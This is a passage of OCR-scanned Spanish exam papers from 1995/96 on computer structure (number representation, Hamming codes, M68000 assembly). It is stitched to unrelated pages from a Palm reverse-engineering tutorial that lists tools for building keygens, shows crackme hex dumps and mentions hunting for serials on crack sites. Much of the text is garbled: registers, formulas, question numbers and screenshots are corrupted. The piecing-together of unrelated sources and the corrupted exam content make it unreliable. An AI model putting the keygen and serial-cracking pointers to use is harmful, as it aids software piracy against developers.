d) Todas las instrucciones que deben ser modificadas aparecen debidamente marcadas en el programa objeto correspondiente. 


INGENIERÍA TÉCNICA en INFORMÁTICA de SISTEMAS y de GESTIÓN 
ASIGNATURA: ESTRUCTURA Y TECNOLOGÍA DE COMPUTADORES I 
CURSO: 95/96 FECHA: 30 de Enero de 1996 HORA: 11.30. FEBRERO 1* SEMANA 


ESTE EXAMEN CONSTA DE DOS HOJAS 
EL TEST ELIMINATORIO FIGURA EN UNA HOJA APARTE 
PROBLEMAS (puntuación máxima total: 6 puntos). 


La solución a los problemas se entregará en hojas aparte proporcionadas por el Tribunal de exámenes. 


PROBLEMA 1 (puntuación máxima: 2 puntos) 
Por una línea de transmisión se desea enviar la palabra Carpeta en código ASCII de 7 bits. 


a) Generar los códigos de paridad longitudinal y transversal correspondientes a dicha palabra utlizando el operador de OR exclusivo (paridad 
par). 


b) Calcular el mínimo número de bits de paridad que sería necesario para representar la palabra Carpeta completa en código de Hamming. 
¿Cuántos bits se ahorran en este caso en relación a los empleados en el apartado a)? 


PROBLEMA 2 (puntuación máxima: 4 puntos) 


Dados el centro (x,.y,) y el radio r de una circunferencia, conoceremos la posición de un punto Z(x,y) en relación a la misma a través de las 


siguientes desigualdades: 


+ Si (x - x,)2 + (y - y,)? < 1?, el punto es interior a la circunferencia. 
- Si (x- x,32 + (y - y)? = 77, el punto pertenece a la circunferencia. 


«Si (x- x,32 + (y - y)? > 7?, el punto es exterior a la circunferencia. 


Diseñar una subrutina en ensamblador del M68000 que reciba las coordenadas del centro y el radio de una circunferencia en los registros DO, D] 
y D2 respectivamente, y diga la posición relativa de un punto Z, cuyas coordenadas se reciben en los registros D3 y D4, respecto a la misma. 


Todos los datos son números enteros de 16 bits positivos o negativos y almacenados en complemento a 2. Suponer que en ningún caso se 
producirá desbordamiento en las operaciones aritméticas realizadas. La subrutina devolverá en el byte menos significativo del registro DS el 
carácter "I" en ASCII si el punto Z es interior, el carácter "E" si es exterior, o el carácter "P" si está sobre la circunferencia. 


Seguir el procedimiento indicado a continuación: 


1) Especificar los argumentos de la subrutina mencionados en el enunciado. 

2) Realizar una descripción textual del algoritmo propuesto (máximo 10 líneas). 

3) Describir por pasos el algoritmo propuesto, indicando las constantes y las variables intermedias utilizadas. 

4) Codificar la subrutina en ensamblador del M68000, comentando adecuadamente las sentencias utilizadas y haciendo referencia a los 
pasos del algoritmo indicados en el apartado 3. 


INGENIERÍA TÉCNICA en INFORMÁTICA de SISTEMAS y de GESTIÓN 
ASIGNATURA: ESTRUCTURA Y TECNOLOGÍA DE COMPUTADORES I 
CURSO: 95/96 FECHA: 13 de Febrero de 1996 HORA: 11.30 DURACIÓN TOTAL: 2 horas 
CÓDIGO CARRERA: CÓDIGO ASIGNATURA: CONVOCATORIA: FEBRERO 1*PP. TIPO DE EXAMEN: 
E 
SISTEMAS= 40 SISTEMAS= 104 SEMANA: 2* SEMANA 
GESTIÓN = 41 GESTIÓN= 104 


ESTE EXAMEN CONSTA DE DOS HOJAS 


LOS ENUNCIADOS DE LOS PROBLEMAS FIGURAN EN UNA HOJA APARTE 


ES NECESARIO ENTREGAR ESTA HOJA DE ENUNCIADOS. 


MATERIAL PERMITIDO DURANTE LA REALIZACIÓN DEL EXAMEN: 
* Addenda de Estructura y Tecnología de Computadores I. 
* Calculadora no programable. 


PREGUNTAS TIPO TEST (puntuación máxima: 4 puntos). 
El test es ELIMINATORIO. Mínimo necesario para aprobar el test: 6 aciertos. 
La solución a las preguntas del test se marcará en el espacio RESPUESTAS en el reverso de esta hoja. 
Sólo hay una respuesta correcta en cada pregunta. 
LAS RESPUESTAS EQUIVOCADAS O EN BLANCO NO PENALIZAN. 


1. Indicar cuál de las siguientes afirmaciones es CIERTA: 

a) Si el período de muestreo es suficientemente pequeño, el proceso de conversión AD no supone pérdida de información. 
b) Si se aumenta el período de muestreo se incrementa el error de conversión AD. 

c) Nunca hay pérdida de información en un proceso de conversión AD, con independencia del período de muestreo. 

d) Las tres anteriores son falsas. 


2. En complemento a dos: 
a) Al sumar dos números de distinto signo puede producirse desbordamiento. 


b) Al restar dos números de distinto signo puede producirse desbordamiento. 

c) Al sumar dos números negativos, hay que restar un uno para obtener el resultado correcto. 

d) Al sumar un número positivo a otro negativo siendo el módulo del negativo mayor que el del positivo, hay que sumar un uno para obtener el 
resultado correcto. 


3. Indicar cuál de las siguientes afirmaciones es cierta: 

a) La distancia de un código coincide con el número de bits erróneos que se pueden detectar en una combinación cualquiera del mismo. 
b) Si a un código denso se le añade un bit de paridad, su distancia pasa a ser 2. 

c) La distancia en un código detector de errores puede ser 1. 

d) Los códigos de Hamming son códigos correctores de errores de distancia 2. 


4. De los mecanismos de E/S se puede decir que: 

a) Para transferencias de grandes bloques de datos, la E/S controlada por programa es siempre más eficiente que el DMA. 

b) En la E/S controlada por interrupciones, el periférico interrumpe a la UCP, y es él mismo quien se encarga de realizar la transferencia de los 
datos. 

c) En la E/S por DMA, es preciso que la interfase de DMA conozca cuál es el tamaño del bloque de datos que se desea transferir, así como la 
dirección de origen del bloque en memoria. 

d) Se utilizan para comunicar periféricos entre sí. 


5. Indicar cuál de las siguientes afirmaciones es cierta: 

a) En el direccionamiento indirecto son necesarios dos ciclos de memoria para obtener el objeto buscado. 

b) El direccionamiento mediante registro significa que existe un registro que contiene la dirección del objeto buscado. 

c) Un direccionamiento indexado requiere el mismo número de accesos a memoria que un direccionamiento indirecto preindexado. 
d) En un direccionamiento relativo a registro base, éste suele incrementarse o decrementarse antes o después de acceder al objeto. 


6. Cuál de las siguientes no es una característica general de los formatos de instrucción de un computador: 

a) El computador debe poseer uno o unos pocos formatos para acomodar todas sus instrucciones. 

b) Los formatos han de ser sistemáticos. 

c) Los tamaños de los formatos suelen amoldarse a la longitud de palabra de memoria del computador. 

d) Los campos del mismo tipo deben tener longitud variable y colocarse en posiciones diferentes para facilitar la compactación de las 
Instrucciones. 


7. Indicar cuál de las siguientes afirmaciones relativas a los discos magnéticos es falsa: 

a) El disco es un periférico de salida que permite el almacenamiento masivo de datos. 

b) El disco es un dispositivo de almacenamiento magnético de acceso directo. 

c) El disco tendrá tantas pistas como paradas en posiciones fijas pueda realizar el brazo de la cabeza lectora. 
d) La información está grabada en cada pista en paquetes completos de datos denominados sectores. 


$. Indicar cuál de las siguientes afirmaciones es cierta: 

a) Los computadores segmentados funcionan bajo un esquema de paralelismo explícito. 

b) En la arquitectura MIMD existe un único flujo de datos que atraviesa múltiples procesadores. 
c) La arquitectura clásica de von Neumann es un ejemplo de arquitectura SISD. 

d) Los procesadores matriciales tienen una arquitectura de tipo MISD. 


9. ¿Qué se entiende por lenguaje base? 

a) El lenguaje en que se escribe el traductor de otro lenguaje. 

b) El código resultante de la traducción y que se encuentra dispuesto para su ejecución en un determinado computador. 
c) El lenguaje simbólico empleado por el programador para representar y codificar un problema. 

d) El lenguaje que permite introducir y corregir textos en el computador. 


10. En el modelo de memoria del M68000 no se cumple lo siguiente: 

a) Las únicas direcciones permitidas para una operación de lectura de un dato de tamaño palabra son las direcciones pares. 

b) El máximo tamaño de memoria principal que se puede utilizar es 224, 

c) La memoria está organizada de forma que a cada byte le corresponde biunívocamente una dirección. 

d) Una palabra direccionada por el valor ¡ se almacena con el byte menos significativo en la dirección ¡ y el byte más significativo en la dirección 


1+1. 
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ASIGNATURA: ESTRUCTURA Y TECNOLOGÍA DE COMPUTADORES I 
CURSO: 95/96 FECHA: 13 de Febrero de 1996 HORA: 11.30. FEBRERO 2* SEMANA 


ESTE EXAMEN CONSTA DE DOS HOJAS 
EL TEST ELIMINATORIO FIGURA EN UNA HOJA APARTE 
PROBLEMAS (puntuación máxima total: 6 puntos). 


La solución a los problemas se entregará en hojas aparte proporcionadas por el Tribunal de exámenes. 


PROBLEMA 1 (puntuación máxima: 2 puntos) 


Indicar el equivalente decimal de los siguientes números representados en el formato IEEE 754 de 32 bits (nótese que se expresan de forma 
compacta en hexadecimal): 

a) 804B0000 

b) 42378000 


PROBLEMA 2 (puntuación máxima: 4 puntos) 


El logaritmo por defecto en base n de un número X es el mayor entero p tal que n? < X. Por ejemplo, el logaritmo por defecto en base 10 del 
número 9 es O, el de 85 es 1, el de 277 es 2, etc. 


Diseñar una subrutina en ensamblador del M68000 que reciba como parámetros sendos números n y X y calcule el logaritmo por defecto en base 
n del número X. Los números n y X son enteros positivos de 16 bits representados en binario sin signo, y se encuentran almacenados en los 
registros DO y D] respectivamente. La subrutina devolverá el valor calculado en el registro D2. Suponer que X > 0, y que siempre se cumplirá 
que nP < 216, o sea, que nP siempre cabrá en un número de 16 bits. 


Seguir el procedimiento indicado a continuación: 


1) Especificar los argumentos de la subrutina mencionados en el enunciado. 

2) Realizar una descripción textual del algoritmo propuesto (máximo 10 líneas). 

3) Describir por pasos el algoritmo propuesto, indicando las constantes y las variables intermedias utilizadas. 

4) Codificar la subrutina en ensamblador del M68000, comentando adecuadamente las sentencias utilizadas y haciendo referencia a los 
pasos del algoritmo indicados en el apartado 3. 


INGENIERÍA TÉCNICA en INFORMÁTICA de SISTEMAS y de GESTIÓN 
ASIGNATURA: ESTRUCTURA Y TECNOLOGÍA DE COMPUTADORES I 
CURSO: 95/96 FECHA: 3 de Septiembre de 1996 HORA: 11.30 DURACIÓN: 2 horas 
CÓDIGO CARRERA: CÓDIGO ASIGNATURA: CONVOCATORIA: SEPBRE. 1*PP. TIPO DE EXAMEN: 
A 
SISTEMAS= 40 SISTEMAS= 104 SEMANA: 1* SEMANA 
GESTIÓN = 41 GESTIÓN= 104 EXAMEN ORIGINAL 


ES NECESARIO ENTREGAR ESTA HOJA DE ENUNCIADOS. 


MATERIAL PERMITIDO DURANTE LA REALIZACIÓN DEL EXAMEN: 
* Addenda de Estructura y Tecnología de Computadores I. 
* Calculadora no programable. 


PREGUNTAS TIPO TEST (puntuación máxima: 4 puntos). 
El test es ELIMINATORIO. Mínimo necesario para aprobar el test: 6 aciertos. 
La solución a las preguntas del test se marcará en el espacio RESPUESTAS en el reverso de esta hoja. 
Sólo hay una respuesta correcta en cada pregunta. 
LAS RESPUESTAS EQUIVOCADAS O EN BLANCO NO PENALIZAN. 


1. Los elementos principales de un computador digital son 

a) Unidad aritmético-lógica, unidad de memoria y unidad de entrada-salida. 

b) Unidad de control de programa, unidad aritmético-lógica y unidad de memoria. 
c) Unidad central de proceso, instrucciones y datos. 

d) Unidad central de proceso, unidad de memoria y unidad de entrada-salida. 


2. El valor del número binario 10110111 es -55, suponiendo que está representado en: 
a) Complemento a 1. 

b) Complemento a 2. 

c) Módulo y signo. 

d) Exceso a 27. 


3. El formato IEEE 754 para representación en números en coma flotante: 

a) Es un formato normalizado de comparación rápida. 

b) Representa la mantisa en complemento a 2. 

c) El exponente se representa en exceso a 2-1, siendo n el número de bits empleados para almacenar dicho exponente, según las diferentes 
precisiones disponibles. 

d) Tiene un bit implícito, que constituye la parte entera de la mantisa, y que siempre es el complementario del bit de signo. 


4. La codificación de Hamming: 

a) Se utiliza para representar números reales. 
b) Permite corregir errores en dos bits. 

c) Tiene una distancia mínima de dos. 

d) Permite detectar errores de dos bits. 


5. Indicar cuál de las siguientes afirmaciones es FALSA: 

a) Las señales de gobierno del operador son de pulso. 

b) Las señales de carga de registros son de pulso. 

c) Las señales de selección del bus, es decir, las que permiten el envío de la información de un registro concreto al bus, son de nivel. 
d) Las señales que marcan los ciclos de memoria, tanto de lectura como de escritura, son de nivel. 


6. Indicar cuál de las siguientes afirmaciones es FALSA: 
a) El direccionamiento relativo a registro base permite fácilmente a los sistemas operativos realizar la reubicación de programas de usuario. 


b) En el direccionamiento relativo a contador de programa, es preciso tener en cuenta que el CP se ha incrementado antes de calcular la dirección 


del objeto referenciado. 

c) En el direccionamiento relativo a registro, la dirección del objeto se obtiene mediante la concatenación del contenido del registro y la del 
campo de dirección, que contiene un cierto desplazamiento. 

d) En el direccionamiento relativo a pila, el campo de desplazamiento es muy pequeño, e incluso a veces ni siquiera existe. 


7. Una empresa fabricante de hardware desea fabricar discos duros de 140625 Mbytes de capacidad. Esta empresa dispone de platos de 


doble cara que contienen 1200 pistas por cada cara, cada una de las cuales tiene 100 sectores. Dado que cada sector tiene 512 bytes, y 


teniendo en cuenta que la cara superior del primer plato y la inferior del último no se utilizan, ¿cuántos platos serán necesarios para que 


el disco alcance la capacidad deseada? 


a) 7 platos. 
b) 9 platos. 
c) 11 platos. 
d) 13 platos. 


S. La paginación para utilizar memoria virtual: 

a) Permite dividir la memoria en bloques de cualquier tamaño. 

b) Consiste en dividir los programas en bloques de tamaños parecidos. 
c) Consiste en dividir la memoria física y lógica en bloques regulares. 
d) Consiste en añadir una memoria auxiliar de alta velocidad. 


9. Cuál de las siguientes NO es una función del programa cargador: 

a) Tomar varios módulos de código objeto, y enlazarlos para que formen un código objeto ejecutable listo para su reubicación. 
b) Copiar el código objeto en las posiciones de memoria donde residirá durante su ejecución. 

c) Reasignar las direcciones contenidas en el programa para que se ajusten a las direcciones en que ha sido cargado. 

d) Lanzar la ejecución del programa recién cargado. 


10. Indicar cuál de las siguientes afirmaciones acerca de los ensambladores (traductores) de dos fases es CIERTA: 

a) En la primera fase de ensamblado, cuando aparece una etiqueta en el programa fuente, el traductor la incorpora a la tabla de códigos, 
asociándole el valor del contador de dirección de ensamblado. 

b) El traductor evalúa los operandos de las instrucciones en la segunda fase ayudándose de la tabla de códigos, construida en la fase anterior. 
c) No es necesario que el traductor calcule la longitud de las instrucciones en la primera fase de ensamblado. 

d) En la segunda fase, las etiquetas presentes en el programa fuente pueden ignorarse. 


INGENIERÍA TÉCNICA en INFORMÁTICA de SISTEMAS y de GESTIÓN 
ASIGNATURA: ESTRUCTURA Y TECNOLOGÍA DE COMPUTADORES I 
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ESTE EXAMEN CONSTA DE DOS HOJAS 
EL TEST ELIMINATORIO FIGURA EN UNA HOJA APARTE 
PROBLEMAS (puntuación máxima total: 6 puntos). 


La solución a los problemas se entregará en hojas aparte proporcionadas por el Tribunal de exámenes. 


PROBLEMA 1 (puntuación máxima: 2 puntos) 


Supóngase que el computador elemental desarrollado en el capítulo 7 de las Unidades Didácticas posee un conjunto de instrucciones aritméticas 
de dos operandos del tipo ADD Rj,desp(Ri), donde: 
e El primer operando es accesible mediante direccionamiento directo a registro, siendo Rj uno de los registros del banco. 
e  Elsegundo operando se encuentra referenciado mediante un direccionamiento relativo a registro, siendo Ri un registro del banco, 
y desp un desplazamiento. 


La instrucción ADD realiza la suma de los dos operandos referenciados, y deja el resultado en el primer operando, o sea, en el registro Rj. 


Supóngase también que el ancho de los registros, buses, operador y memoria es de 16 bits, y que en un momento dado el contenido de los 
registros R1 y R2 es (R1)=$A025 y (R2)=$0528 respectivamente. Además, la memoria es de 64 Kpalabras, y el contenido de las posiciones de 
memoria a partir de la $A000 es exactamente el inverso de su dirección expresada en binario (por ejemplo, ($A000)=$0005, ($B427)=$E42D, 
etc). En ese momento se ejecuta la instrucción ADD R2,834(R1). Se pide: 


a) (1 punto) Suponiendo que la instrucción se encuentra totalmente contenida en RI y ya ha sido decodificada, enumerar cuáles son las acciones 
necesarias para colocar el segundo operando en el registro temporal RO1, indicando las señales que deberán ser activadas en cada paso. 


b) (1 punto) Calcular: 
e La dirección donde se encuentra el segundo operando de la instrucción. 
e El valor en hexadecimal del segundo operando de la instrucción. 
e El contenido final, en hexadecimal, del registro R2. 


PROBLEMA 2 (puntuación máxima: 4 puntos) 


Diseñar una subrutina en ensamblador del microprocesador M68000 que, dado un dato de tamaño palabra (16 bits), inspeccione los bits que lo 
componen y contabilice cuántos de entre ellos se encuentran a 1. El dato de entrada se proporciona en la palabra menos significativa del registro 
DO. La subrutina devolverá el número de bits a 1 en el byte menos significativo del registro DI. 


Seguir el procedimiento indicado a continuación: 


1) (05 puntos) Especificar los argumentos de la subrutina mencionados en el enunciado. 

2) (0”5 puntos) Realizar una descripción textual del algoritmo propuesto (máximo 10 líneas). 

3) (1 punto) Describir por pasos el algoritmo propuesto, indicando las constantes y las variables intermedias utilizadas. 

4) (2 puntos) Codificar la subrutina en ensamblador del M68000, comentando adecuadamente las sentencias utilizadas y haciendo 
referencia a los pasos del algoritmo indicados en el apartado 3. 
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ESTE EXAMEN CONSTA DE DOS HOJAS 
LOS ENUNCIADOS DE LOS PROBLEMAS FIGURAN EN UNA HOJA APARTE 
ES NECESARIO ENTREGAR ESTA HOJA DE ENUNCIADOS. 


MATERIAL PERMITIDO DURANTE LA REALIZACIÓN DEL EXAMEN: 
* Addenda de Estructura y Tecnología de Computadores I. 
* Calculadora no programable. 


PREGUNTAS TIPO TEST (puntuación máxima: 4 puntos). 
El test es ELIMINATORIO. Mínimo necesario para aprobar el test: 6 aciertos. 
La solución a las preguntas del test se marcará en el espacio RESPUESTAS en el reverso de esta hoja. 
Sólo hay una respuesta correcta en cada pregunta. 
LAS RESPUESTAS EQUIVOCADAS O EN BLANCO NO PENALIZAN. 


1. Dado un número negativo expresado en complemento a 2 con n bits, su ampliación a m bits (con m>n) se realiza añadiendo entre el bit 
de signo y el siguiente: 

a) (m-n) ceros. 

b) (m-n) unos. 

c) (m-n) veces repetido el bit siguiente al de signo. 
d) (m-n) veces repetido el complemento del bit siguiente al de signo. 


2. Indicar cuál de las siguientes afirmaciones es cierta: 

a) En los sistemas de representación de coma flotante normalizada, la resolución de la mantisa es variable. 

b) En los sistemas de representación de coma flotante normalizada, la resolución del conjunto mantisa-exponente es fija en todo el rango de 
representación. 

c) En los sistemas de representación en coma fija, la resolución es uniforme en todo el rango de representación. 

d) Ninguna de las restantes afirmaciones es cierta. 


3. Un código denso se caracteriza porque: 

a) Todas o casi todas las combinaciones binarias posibles tienen significado. 
b) Permite la detección de errores pero no su corrección. 
c) Sólo ciertas combinaciones binarias son significativas. 

d) Permite la detección y corrección de errores. 


4. Según el modelo de computador expuesto en el tema 7 del texto, en la fase de búsqueda de una instrucción: 
a) Intervienen los registros CP, AC, RD, RM y RI. 

b) Se utilizan seis períodos de reloj. 

c) Se utilizan los registros CP, RI, RD y RM. 

d) Intervienen el bus de direcciones y el de control, pero no el de datos. 


5. En el direccionamiento por indirección: 

a) Se calcula aritméticamente la dirección final a partir de la dirección intermedia. 

b) Realiza dos operaciones de lectura en memoria en total, incluyendo la lectura de la instrucción. 

c) Se suele utilizar como método de direccionamiento complementario al de paginación, para permitir que un módulo de programa pueda 
solaparse en varias páginas. 

d) Se accede a un registro que sirve de puntero a la dirección del operando. 


6. Sea una tarjeta controladora de vídeo que admite diferentes configuraciones en modo gráfico con distintas resoluciones y número de 
planos. Se pretende almacenar en su memoria gráficos de 1024x768 puntos, y en cada punto se pretende representar uno entre 65536 
colores. ¿Cuál es la mínima cantidad de memoria que habrá que instalar en la controladora para almacenar en ella gráficos de tales 
características? 

a) 384 Kbytes. 

b) 768 Kbytes. 

c) 15 Mbytes. 

d) 225 Mbytes. 


7. Indicar cuál de las siguientes afirmaciones es CIERTA: 

a) Una memoria entrelazada es una memoria asociativa dividida en varios módulos. 

b) Una memoria caché es una memoria de alta velocidad suficientemente grande para contener enteros el programa que se está ejecutando y 
todos sus datos. 

c) La paginación es una técnica que consiste en dividir el espacio virtual de memoria en bloques de tamaño variable denominados páginas. 
d) Una memoria asociativa permite hacer operaciones de búsqueda y comparación en paralelo. 


S. Un programa ensamblador: 

a) Genera un módulo capaz de ser ejecutado directamente por el computador. 

b) Traduce un texto, en lenguaje ensamblador, al lenguaje máquina de un computador determinado. 
c) Analiza y ejecuta cada sentencia de un programa fuente. 

d) Traduce un texto escrito en lenguaje base a otro escrito en lenguaje objeto. 


9. En el registro de código de condición: 

a) El indicador V se pone a 1 cuando se suman, en complemento a dos, dos números de igual signo y el resultado es del mismo signo. 
b) El indicador X señala el bit de acarreo de la posición más significativa del resultado de cualquier operación. 

c) El indicador X señala el bit de acarreo de la posición más significativa del resultado de una operación aritmética o de desplazamiento. 
d) Consta de cuatro indicadores: C, Z, N y X. 


10. Indicar cuál de las siguientes afirmaciones es FALSA: 

a) El problema de las referencias adelantadas complica el diseño de los programas ensambladores de una fase. 

b) Emplear ensambladores cruzados permite emplear los recursos de máquinas potentes para desarrollar programas que serán ejecutados por 
sistemas de control especializados. 

c) Los ensambladores de dos fases construyen la tabla de símbolos en la primera fase de ensamblado. 


d) Un ensamblador residente necesita un programa simulador para poder verificar si la ejecución del programa ensamblado es correcta. 
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ESTE EXAMEN CONSTA DE DOS HOJAS 
EL TEST ELIMINATORIO FIGURA EN UNA HOJA APARTE 
PROBLEMAS (puntuación máxima total: 6 puntos). 


La solución a los problemas se entregará en hojas aparte proporcionadas por el Tribunal de exámenes. 


PROBLEMA 1 (puntuación máxima: 2 puntos) 


Sea la siguiente secuencia de programa en ensamblador del M68000: 


ORG $6000 ; sentencia 1 

CODIGO MOVE.B ++$47,DO ; sentencia 2 
MOVE.B +$25,D1 ; sentencia 3 

BUCLE ADD.B DO,D1 ; sentencia 4 
BCC BUCLE ; sentencia 5 

FIN NOP ; sentencia 6 


a) (1 punto) Expresar en hexadecimal el código máquina obtenido al ensamblar las instrucciones de las sentencias 
ensamblador 3 y 4. 

b) (1 punto) Indicar el valor que tomarán los registros DO y D] cuando se ejecute el programa desde la sentencia CODIGO 
hasta la sentencia FIN. 


PROBLEMA 2 (puntuación máxima: 4 puntos) 


Diseñar una subrutina en ensamblador del M68000 que convierta un número decimal representado de forma alfanumérica a su representación en 
complemento a 2. El número de entrada se encontrará almacenado en memoria como una secuencia de caracteres ASCII, correspondientes a los 
dígitos numéricos, precedida por el carácter “*-” si el número es negativo. El final de la secuencia de caracteres estará señalado por la aparición 
del carácter ASCIT nulo. La subrutina recibirá la dirección del primer carácter ASCII de la secuencia en el registro AO. La subrutina devolverá la 
representación en complemento a 2 en el registro DO. Suponer que el resultado se puede devolver en 16 bits, y que en ningún caso se producirá 
desbordamiento en las operaciones aritméticas realizadas. 


Seguir el procedimiento indicado a continuación: 


1) (05 puntos) Especificar las estructuras de datos iniciales y los argumentos de la subrutina mencionados en el enunciado. 

2) (0”5 puntos) Realizar una descripción textual del algoritmo propuesto (máximo 10 líneas). 

3) (1 punto) Describir por pasos el algoritmo propuesto, indicando las constantes y las variables intermedias utilizadas. 

4) (2 puntos) Codificar la subrutina en ensamblador del M68000, comentando adecuadamente las sentencias utilizadas y haciendo 
referencia a los pasos del algoritmo indicados en el apartado 3. 


Capitulo 9 


SOLUCIÓN DE LOS EXÁMENES REALIZADOS EN EL CURSO 1995/2010 
ESTRUCTURA Y TECNOLOGÍA DE COMPUTADORES 1 


FEBRERO FEBRERO SEPTIEMBRE SEPTIEMBRE 
1* SEMANA 2% SEMANA ORIGINAL RESERVA 
(TIPO A) (TIPO E) (TIPO A) (TIPO E) 


Palm Spanish Tutor 


Tabla de Caracteres Ascll / Hexadecimal / Decimal 


(X)NewBies ( )|ntermedio ( )Avanzado ( )Master ( )Gúru 


INTRODUCCION 


Esta tabla debes de aprendértela de memoria para realizar nuestros menesteres tanto para Palm Os como Para 
Windows de 32 Bits, También en Linux , Mac, Pocket, Etc 


AL ATAQUE 


Tabla de Caracteres Ascll / Hexadecimal / Decimal 


20 32 21 33 ! 
22 34 . 23 35 $4 
24 36 $ 25 37 % 
26 38 8 27 39 
28 40 ( 29 41 ) 
2A 42 + 2B 43 + 
2C 44 2D 45 

2E 46 2F 47 


(de) 

Lh 

[51] 

N 
00 ah No 

(99) 

al 

[$1] 

(q) 
O JJOO a» — 


3A 58 ] 3B 59 


3C 60 < 3D 61 = 
3E 62 > 3F 63 ? 
40 64 a) 41 65 A 
42 66 B 43 67 C 
44 68 D 45 69 E 
46 70 F 47 71 G 
48 72 H 49 73 

4A 74 J 4B 75 K 
4C 76 L 4D 77 M 
4E 78 N 4F 79 O 
50 80 P 51 81 Q 
52 82 R 53 83 Ss 
54 84 T 55 85 U 
56 86 v 57 87 W 
58 88 X 59 89 Y 
5A 90 Z 5B 91 [ 

50 92 j 5E 93 ] 

5E 94 A 5F 95 E 
60 96 > 61 97 a 
62 98 b 63 99 c 
64 100 d 65 101 e 
66 102 f 67 103 g 
68 104 h 69 105 

6A 106 j 6B 107 k 
6C 108 6D 109 m 
6E 110 n 6F 111 o 
70 112 p 71 113 q 
72 114 r 73 115 s 
74 116 t 75 117 u 
76 118 v 77 119 w 
78 120 x 79 121 y 
7A 122 z 7B 123 [ 

7C 124 ] 7D 125 ] 

7E 126 - 


Palm Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, 


sobre Ingenieria Inversa y Programacion en palm. Email "Colabora con tus Proyectos" 


Palm Spanish Tutor 


Mostrar herramientas que podemos utilizar unas de tantas en la Web. 


INTRODUCCION 


Las herramientas ha utilizar durante los siguientes tutorales son los siguientes: 


AL ATAQUE 
1.- CodeWarrior $ Demo ó Full para Palm 


Para crear a un PSNG Plugin usted necesitamos Code Warrior 8 Demo para PalmOS Minimo, Si puedes conseguir la versión actualizada que 
mejor. Code Warrior5 no opera con PSNG SDK 2.0.... Util tambien para crear los generadores de llaves usando C/C++, www.metrowerks.com 


¿$ Metrowerks CodeWarrior 
File Edit View Search Project Debug Palm Window Help 5 


YóSBo-<ARNAA MN oóÉESRAMAAaB 


¿2 SampleCalc.c 


ampleCalc.mcp 


bh + ( - M- E Path: D:BenjaminsMy Download FilestCod: 10 SampleCalc z a Y 6 > E 


Files | Segments | Targets | 


e E Source - 
Y SampleCalc.c 
MM SampleCalcRsc.h 
E Resources 
MM SampleCalc.rsrc 
(3 Palm OS Device 


» 
. 


la la da la la la 


ic Boolean MainFormHandleEvent(EventPtr CIN 


FormPtr frmP: 

Boolean handled = 

Boolean displayNeed: 

Char digitToáppend = 


2 menuEvent : 
ap 


MainFormDoConmand (eventP->data.menu.itenlD): 


e frnOpenEvent : 


Line 779  Col31 ||: 


2.- PSNG SDK2 


Éste es un Framework genial para que CodeWarrior6 creé Keygens para Aplicaciones PalmOS.. 
Solo necesitamos escribir la rutina del keygen en el DoCalc 


3.- PRCEdit 


Destripa archivos PRC mostrándonos formularios, ventanas de mensaje "Talt's", String,tsc. 


$3 Prcedit 1 - [C:AMy DownloadsFields.rcp] 


Be File Edit View Tools Window Help - (81 xj 
Fields.pre Fields.rop | 


ALERT ID 1001 
INFORMATION 
+ 1000 This time we [BEGIN 
1702 L4BEL * TITLE "Empty Field" 
1703 L4BEL [ MESSAGE "Input something please!" 
1301 FIELD BUTTONS "Ok" 
1304 FIELD (END 
1105BUTTOI 
23 Alerts ALERT ID 1002 
+ 1001 Input someth [INFORMATION 
+ 1002 Third tutorial. ¡BEGIN 
23 Strinas TITLE "ibout this Tute" 
23 dc.b MESSAGE "Third tutorial. Using Fields." 
BUTTONS "K" 
END 


+ 


+...» 


FORM ID 1000 AT (0 0 160 160) 

NOFRAME 

MENUID 1000 

BEGIN 
TITLE "This time we use Fields!" 
LABEL "Source Text" ID 1702 AT (19 41) FONT O 
LABEL "Dest. Text" ID 1703 AT (19 76) FONT O 
FIELD ID 1301 AT (80 40 40 15) EDITABLE SINGLELINE UNDERLINED LEFTALIGN ] 
FIELD ID 1304 AT (80 76 40 15) EDITABLE SINGLELINE UNDERLINED LEFTALIGN ] 
BUTTON "Go for it!" ID 1105 AT (49 116 40 15) LEFTANCHOR FONT O 

END 
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Done D jumps on stack Elemento recopilado, 


3.- Debuffer 1.2 


Para analizar el código vivo, Entiendase Debugger depurador de archivos PRC. Así como en Windows 32 tenemos el NuMega SoftICE 
Driver Suite 2.6 en Palm tenemos el Debuffer 1.2 que además es Freeware. 


Palm Application Explorer - Crackmel Hb++ A ES 


2 Ali 


File Edit View Help 

CEE 

- Crackmel Hb++. 
MIA ra di Resource size: 122 bytes Fl offset: Os25DOF (155087) in | Qu] 


2032 (0x07f0) 
>) Talt (2) 
4 (0x0004) 


3D Formula 


A Powered by HB++ 
Evaluation Version 


=- Tbmp (22) Ñ 
2000 (0x07d0) o commercial use 
2001 (0x07d1) 
2002 (0x07d2) 2003 - Peter Holmes 


Consulting 


2003 (0x07d3] 
2004 (Ox07d4) 
2005 (0x07d5] 
2006 (0x07d6] 
2007 (0x07d7) 
2008 (0x07d8] 
2009 (0x07d9] 


2010 (0x07da) 0000: 62 60 80 60 61 00 

2011 (0x07db] 0008: 33 44 20 46 6F 72 6D 75 3D Formu 

2012 (0x07dc) 0010: 6C 61 58 6F 77 65 72 la.Power 

2013 (0x07dd) 0018: 65 64 20 62 79 28 48 42 ed by HB y 

2014 (0x07de) y - 
Alert [Regis Nicolas <Regis.Nicolas¿MPalmS ource. com>)] NUM £ 


4.- Ultraedit v10c Editor Hexadecimal Español 


Editor Hexadecimal para cualquier tipo de archivos tanto para Windows como para Palm Os, Es Shareware pero vale la pena comprarlo, Si 
deseas buscar un serial valido en la paginas de cracks es bajo tu propio riesgo y responzabilidad. 


€ UltraE dit-32 - [C:AMy DownloadsiCrackmel Hb++*] 


(E Archivo Editar Buscar Proyecto Wer Formato Columna Macro Avanzado Wentana Ayuda =l8/x/ 

||. Crackmel Hb++ | | 
D0000000h: 43 72 61 63 6B 6D 65 20 31 2E 00 00 00 00 00 00 ; Crackme 1....... a 
00000010h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 42 5 ....o.ooooooo... HB 
00000020h: 00 41 00 01 BE 4B BF 98 BE 4B BF 98 BE 4B BF 98 ; .A..EE] PEF YEF7 y 
00000030h: 00 00 00 00 00 00 00 00 00 00 00 00 61 70 7D 6_ 5 ...oooooooo.. appl 
00000040h: 33 64 66 6F 00 00 00 00 00 00 00 00 00 48 63 6F ; 3df0......... Hco 
D0000050h: 64 65 00 03 00 00 03 1E 63 6F 64 65 00 02 00 00 ; de...... code.... 
